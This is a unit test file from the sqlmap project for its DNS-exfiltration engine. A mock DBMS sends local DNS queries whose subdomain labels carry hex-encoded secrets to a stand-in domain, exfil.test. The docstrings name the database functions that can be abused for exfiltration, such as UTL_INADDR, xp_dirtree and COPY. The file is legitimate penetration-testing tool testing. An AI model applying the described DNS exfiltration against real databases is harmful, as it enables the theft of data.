#!/usr/bin/env python

"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission

The DNS-exfiltration extraction engine (lib/techniques/dns/use.py dnsUse) and the
channel-detection probe (lib/techniques/dns/test.py dnsTest).

DNS exfil is normally driven by a back-end DBMS that performs an actual DNS lookup of an
attacker-controlled hostname (Oracle UTL_INADDR, MSSQL xp_dirtree, ...), encoding the queried
data in the subdomain labels which then reach sqlmap's in-process DNS server. That DBMS
behaviour cannot be reproduced locally without a real DNS-emitting engine, so here we drive
the REAL dnsUse()/dnsTest() logic + the REAL DNSServer (on a high port, no root) and emulate
ONLY that one step: a mock Request.queryPage plays the DBMS - it takes the per-iteration
boundaries dnsUse generated and fires a genuine UDP DNS query for
'prefix.HEXCHUNK.suffix.domain' at the DNS server. So the chunking/offset/reassembly loop, the
dns_request snippet rendering, the DNSServer packet parse, pop(prefix,suffix), regex
extraction, hex decoding and the detection-then-disable logic are all exercised for real; if
any of them regress these go red - without a live DBMS.

NOTE on fidelity: secrets are kept ASCII so the mock's byte-slice chunking matches a DBMS
character-substring exactly. Multi-byte (UTF-8) values, where DBMS SUBSTRING is
character-based and a chunk could split a code point, need the real-DBMS run.
"""

import binascii
import os
import socket
import struct
import sys
import threading
import time
import unittest

sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
from _testutils import bootstrap, set_dbms
bootstrap()

from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.data import conf, kb
from lib.core.threads import getCurrentThreadData
from lib.core.enums import DBMS
from lib.core.exception import SqlmapNotVulnerableException
from lib.core.settings import DNS_BOUNDARIES_ALPHABET
from lib.core.settings import MAX_DNS_LABEL
from lib.request.connect import Connect
from lib.request.dns import DNSServer
import lib.techniques.dns.use as dnsmod
import lib.techniques.dns.test as dnstestmod


def _build_query(name, tid=b"\x12\x34"):
    """
    Builds a raw DNS query packet (class IN, type A, recursion desired) for L{name}.

    Empty labels (e.g. produced by a leading/trailing/double dot) are skipped. L{tid} is the
    two-byte transaction ID placed at the start of the header.
    """

    # header: ID, flags (RD set), QDCOUNT=1, ANCOUNT=0, NSCOUNT=0, ARCOUNT=0
    pkt = tid + b"\x01\x00" + b"\x00\x01" + b"\x00\x00" + b"\x00\x00" + b"\x00\x00"

    # QNAME: every label is emitted as a length octet followed by the label bytes
    for label in name.split("."):
        if label:
            pkt += struct.pack("B", len(label)) + label.encode()

    # root label terminator, then QTYPE=A and QCLASS=IN
    return pkt + b"\x00" + b"\x00\x01" + b"\x00\x01"


def _chunk_length(dbms):
    """
    Returns the number of secret bytes the mock DBMS packs into one DNS query for L{dbms}.

    Single shared copy of the arithmetic these tests use to mirror dnsUse's chunk_length
    (the value is hex-encoded, hence two label characters per byte).
    NOTE(review): must be kept in sync with lib/techniques/dns/use.py by hand
    """

    if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):
        return MAX_DNS_LABEL // 2

    return MAX_DNS_LABEL // 4 - 2


class _HighPortDNSServer(DNSServer):
    # same logic as the real server (parse/pop/run), just bound high so no root is needed

    def __init__(self, port=0):
        # NOTE: DNSServer.__init__ is intentionally not invoked here; only the attributes
        # set below are initialized (port=0 lets the OS pick a free unprivileged port)
        self._requests = []
        self._lock = threading.Lock()
        self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        try:
            self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self._socket.bind(("127.0.0.1", port))
            self.port = self._socket.getsockname()[1]
        except socket.error:
            # don't leave a half-configured socket behind if it can't be bound
            self._socket.close()
            raise

        self._running = False
        self._initialized = False

    def close(self):
        """
        Marks the server as stopped and closes its UDP socket (best effort)
        """

        self._running = False

        try:
            self._socket.close()
        except socket.error:
            pass


# conf/kb entries forced to these values for each test (originals are restored in tearDown)
_CONF = {"dnsDomain": "exfil.test", "hexConvert": False, "api": False, "verbose": 0, "forceDns": False}
_KB = {"dnsTest": True, "dnsMode": False, "bruteMode": False, "safeCharEncode": False}


class _DnsCase(unittest.TestCase):
    """
    Shared fixture: one in-process DNS server per test class, plus per-test patching (and
    restoring) of the sqlmap globals that dnsUse()/dnsTest() touch.
    """

    DBMS_NAME = "MySQL"

    @classmethod
    def setUpClass(cls):
        server = _HighPortDNSServer()

        try:
            server.run()

            # bounded wait: never spin indefinitely if the in-process server fails to bind/init
            # (e.g. a taken port on CI) - fail loudly instead of hanging the whole suite
            deadline = time.time() + 10
            while not server._initialized:
                if time.time() > deadline:
                    raise RuntimeError("in-process DNS test server failed to initialize within 10s")
                time.sleep(0.02)
        except Exception:
            # unittest does not call tearDownClass when setUpClass fails, so the socket has
            # to be released here or it would leak for the rest of the run
            server.close()
            raise

        cls.server = server

    @classmethod
    def tearDownClass(cls):
        server = getattr(cls, "server", None)

        if server is not None:
            server.close()

        cls.server = None

    def setUp(self):
        self._saved_conf = {k: conf.get(k) for k in _CONF}
        self._saved_kb = {k: kb.get(k) for k in _KB}
        self._saved_qp = Connect.queryPage
        self._saved_randomStr = dnsmod.randomStr
        self._saved_randomInt = dnstestmod.randomInt
        self._saved_dnsServer = conf.get("dnsServer")
        self._saved_hdbR, self._saved_hdbW = dnsmod.hashDBRetrieve, dnsmod.hashDBWrite

        # the DNS exfil path prints its own "[INFO] retrieved: ..." progress straight to stdout
        # via dataToStdout() (it bypasses the logger, so the suite's log-level silencing can't
        # catch it); suppress it through sqlmap's own per-thread stdout gate so the run stays clean
        self._saved_disableStdOut = getCurrentThreadData().disableStdOut
        getCurrentThreadData().disableStdOut = True

        for k, v in _CONF.items():
            conf[k] = v

        for k, v in _KB.items():
            kb[k] = v

        conf.dnsServer = self.server

        # isolate from the session hash DB (avoid cross-test value caching / uninitialized store)
        dnsmod.hashDBRetrieve = lambda *a, **k: None
        dnsmod.hashDBWrite = lambda *a, **k: None

        # MSSQL/PostgreSQL build the payload via the stacked-query injection plumbing
        # (agent.prefixQuery/agent.payload, needing a full kb.injection). That plumbing is
        # generic - not DNS logic - and the mock oracle ignores the payload, so stub it to a
        # pass-through; the DNS-specific snippet/substring/chunking still runs for real.
        self._saved_prefixQuery, self._saved_payload = agent.prefixQuery, agent.payload
        agent.prefixQuery = lambda expression, *a, **k: expression
        agent.payload = lambda place=None, parameter=None, value=None, newValue=None, where=None: newValue or ""

        set_dbms(self.DBMS_NAME)

    def tearDown(self):
        getCurrentThreadData().disableStdOut = self._saved_disableStdOut

        for k, v in self._saved_conf.items():
            conf[k] = v

        for k, v in self._saved_kb.items():
            kb[k] = v

        conf.dnsServer = self._saved_dnsServer

        # reading a staticmethod through its class yields the bare function, so it has to be
        # re-wrapped on the way back: a plain function stored on the class would turn into an
        # unbound method on Python 2 (breaking every later Request.queryPage(...) call) and
        # would bind 'self' if ever reached through an instance on Python 3
        restored_qp = staticmethod(self._saved_qp)
        Connect.queryPage = restored_qp
        dnsmod.Request.queryPage = restored_qp

        dnsmod.randomStr = self._saved_randomStr
        dnstestmod.randomInt = self._saved_randomInt
        dnsmod.hashDBRetrieve, dnsmod.hashDBWrite = self._saved_hdbR, self._saved_hdbW
        agent.prefixQuery, agent.payload = self._saved_prefixQuery, self._saved_payload

    def _install_oracle(self, secret, working=True, force=None):
        """
        Installs a mock queryPage that plays the DBMS: for each dnsUse iteration it fires a
        real UDP DNS query carrying the next hex chunk of L{secret}. working=False models a
        dead DNS channel (the DBMS never emits a lookup). force=(prefix, suffix) pins the
        random boundary labels (to construct adversarial cases like a domain/suffix collision).
        """

        secret_bytes = secret.encode("utf-8")
        boundaries = []     # every boundary label handed out so far (prefix, suffix, prefix, ...)
        served = [0]        # offset of the next unsent byte (a list so the closure can mutate it)
        real_randomStr = self._saved_randomStr

        def spy_randomStr(length=4, alphabet=None, **kw):
            # only the 3-character boundary labels are recorded (and optionally pinned);
            # any other randomStr() use is passed straight through to the real function
            if alphabet == DNS_BOUNDARIES_ALPHABET and length == 3:
                out = force[len(boundaries) % 2] if force else real_randomStr(length=length, alphabet=alphabet, **kw)
                boundaries.append(out)
                return out

            return real_randomStr(length=length, alphabet=alphabet, **kw) if alphabet is not None else real_randomStr(length=length, **kw)

        dnsmod.randomStr = spy_randomStr

        chunk_length = _chunk_length(Backend.getIdentifiedDbms())

        def oracle(payload=None, *args, **kwargs):
            if not working:
                return None

            # the two most recently generated labels belong to the current iteration
            prefix, suffix = boundaries[-2], boundaries[-1]
            chunk = secret_bytes[served[0]:served[0] + chunk_length]

            if chunk:
                host = "%s.%s.%s.%s" % (prefix, binascii.hexlify(chunk).decode(), suffix, conf.dnsDomain)

                c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                try:
                    c.settimeout(3)
                    c.sendto(_build_query(host), ("127.0.0.1", self.server.port))
                    c.recvfrom(512)
                finally:
                    # released even when the send (and not only the receive) fails
                    c.close()

                served[0] += len(chunk)

                # give the server thread up to ~1s to record the request before returning
                needle = host.encode()
                for _ in range(100):
                    with self.server._lock:
                        if any(needle in r for r in self.server._requests):
                            break
                    time.sleep(0.01)

            return None

        Connect.queryPage = staticmethod(oracle)
        dnsmod.Request.queryPage = staticmethod(oracle)

    def _extract(self, secret):
        """
        Runs the real dnsUse() against a working mock channel that leaks L{secret}
        """

        self._install_oracle(secret)
        return dnsmod.dnsUse("%s AND %d=%d", "user()")


class TestDnsExfilEngine(_DnsCase):
    DBMS_NAME = "MySQL"

    def test_short_value(self):
        self.assertEqual(self._extract("luther"), "luther")

    def test_value_spanning_multiple_dns_labels(self):
        # > one DNS label -> forces the chunking/offset/reassembly loop (multiple queries)
        secret = "The quick brown fox jumps over the lazy dog 0123456789 abcdef"
        self.assertEqual(self._extract(secret), secret)

    def test_exact_chunk_boundary(self):
        # length exactly one chunk: last-chunk break condition (len < chunk_length) edge
        secret = "A" * _chunk_length(Backend.getIdentifiedDbms())
        self.assertEqual(self._extract(secret), secret)

    def test_special_characters(self):
        secret = "p@ss W0rd!#%&"
        self.assertEqual(self._extract(secret), secret)

    def test_domain_label_colliding_with_suffix(self):
        # adversarial: --dns-domain's leading label equals the random suffix. A greedy
        # extraction regex would run past the real boundary into the domain and corrupt the
        # value; the (lazy) extraction must still recover it exactly.
        conf.dnsDomain = "hhh.exfil.test"  # leading label 'hhh' == forced suffix
        self._install_oracle("luther", force=("ggg", "hhh"))
        self.assertEqual(dnsmod.dnsUse("%s AND %d=%d", "user()"), "luther")


class TestDnsExfilEngineOracle(TestDnsExfilEngine):
    # Oracle: different dns_request snippet (UTL_INADDR.GET_HOST_ADDRESS, '||' concat) and
    # SUBSTRC substring template - re-runs the whole battery through the Oracle dialect.
    DBMS_NAME = "Oracle"


class TestDnsExfilEnginePostgres(TestDnsExfilEngine):
    # PostgreSQL: stacked-query branch (agent.payload), plpgsql COPY dns_request snippet,
    # 'SUBSTRING((...)::text FROM x FOR y)' substring template.
    DBMS_NAME = "PostgreSQL"


class TestDnsExfilEngineMssql(TestDnsExfilEngine):
    # MSSQL: stacked-query branch, xp_dirtree dns_request snippet, and crucially a SMALLER
    # chunk_length (MAX_DNS_LABEL//4 - 2) - exercises the alternate chunking arithmetic.
    DBMS_NAME = "Microsoft SQL Server"


class TestDnsLabelInvariant(unittest.TestCase):
    """The exfil chunk is hex-encoded into ONE DNS label, so 2*chunk_length must never exceed
    the 63-octet DNS label limit - otherwise the query carries an invalid (over-long) label and
    exfil silently breaks. Guards the chunk_length arithmetic in dnsUse for every supported DBMS."""

    def test_hex_label_within_max_dns_label(self):
        for dbms in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL):
            chunk_length = _chunk_length(dbms)
            self.assertGreater(chunk_length, 0, "%s: non-positive chunk_length" % dbms)
            self.assertLessEqual(2 * chunk_length, MAX_DNS_LABEL, "%s: hex label (%d) exceeds MAX_DNS_LABEL (%d)" % (dbms, 2 * chunk_length, MAX_DNS_LABEL))


class TestDnsChannelDetection(_DnsCase):
    """dnsTest(): probes the channel with a known random integer and disables DNS exfil if the
    value doesn't come back (unless --force-dns, which then aborts)."""

    DBMS_NAME = "MySQL"
    KNOWN = 4815162342

    def _patch_known_int(self):
        # pin the probe value so the mock channel knows what to send back
        dnstestmod.randomInt = lambda *a, **k: self.KNOWN

    def test_detection_success_keeps_channel(self):
        self._patch_known_int()
        self._install_oracle(str(self.KNOWN), working=True)
        dnstestmod.dnsTest("%s AND %d=%d")
        self.assertTrue(kb.dnsTest)
        self.assertEqual(conf.dnsDomain, "exfil.test")  # channel kept

    def test_detection_failure_disables_channel(self):
        self._patch_known_int()
        self._install_oracle(str(self.KNOWN), working=False)  # dead channel
        dnstestmod.dnsTest("%s AND %d=%d")
        self.assertFalse(kb.dnsTest)
        self.assertIsNone(conf.dnsDomain)  # exfil turned off

    def test_detection_failure_with_force_dns_raises(self):
        self._patch_known_int()
        conf.forceDns = True
        self._install_oracle(str(self.KNOWN), working=False)
        self.assertRaises(SqlmapNotVulnerableException, dnstestmod.dnsTest, "%s AND %d=%d")


if __name__ == "__main__":
    unittest.main(verbosity=2)